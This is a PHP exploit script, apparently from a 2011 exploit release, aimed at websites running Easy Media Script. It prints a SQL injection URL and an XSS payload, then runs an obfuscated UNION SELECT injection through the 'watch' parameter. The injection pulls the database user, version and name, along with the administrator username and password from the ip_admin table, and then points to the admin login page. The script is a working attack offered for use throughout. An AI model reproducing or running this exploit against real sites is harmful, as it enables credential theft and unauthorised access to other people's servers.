52 lines
No EOL
1.2 KiB
PHP
52 lines
No EOL
1.2 KiB
PHP
<?php
|
|
|
|
if(!$argv[1])
|
|
die("
|
|
|
|
Usage : php exploit.php [site]
|
|
Example : php exploit.php http://site.tld/[PATH]/
|
|
|
|
");
|
|
print_r("
|
|
|
|
# Tilte......: [ Easy Media Script SQL Injection ]
|
|
# Author.....: [ Lagripe-Dz ]
|
|
# Date.......: [ 27-o5-2o11 ]
|
|
# Location ..: [ ALGERIA ]
|
|
# HoMe ......: [ Sec4Ever.com & Lagripe-Dz.org ]
|
|
# Download ..: [ http://easymediascript.com/ ]
|
|
# Gr33tz ....: [ All Sec4ever Member'z ]
|
|
|
|
-==[ ExPloiT ]==-
|
|
|
|
# SQL Inj : http://site/ems/?watch=1'
|
|
# XSS : http://site/ems/?go=\"><
|
|
ScRiPt>alert(0)</ScRiPt>
|
|
|
|
-==[ Start ]==-
|
|
|
|
");
|
|
|
|
$t=array("db_user "=>"user()","db_version"=>"version()","db_name
|
|
"=>"database()",
|
|
"UserName "=>"user","Password "=>"pass");
|
|
|
|
foreach($t as $r=>$y){
|
|
|
|
$x=@file_get_contents($argv[1]."?watch=-1'/**//**//*!uNiOn*//**//**//*!sElEcT*//**//**/1,group_concat(0x".bin2hex("<$r>").",$y,0x".bin2hex("<$r>")."),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/**//**/fRoM/**//**/ip_admin%23");
|
|
|
|
preg_match_all("{<$r>(.*?)<$r>}i",$x, $dz);
|
|
|
|
echo $u = ($dz[1][0]) ? "[-] $r : ".$dz[1][0]."\n" : "[-] $r : Failed
|
|
!\n";
|
|
|
|
}
|
|
echo "[-] AdminPanel : ".$argv[1]."ip-admin/login.php\n";
|
|
|
|
print_r("
|
|
-==[ Finished ]==-
|
|
");
|
|
|
|
# END .. !
|
|
|
|
?>
|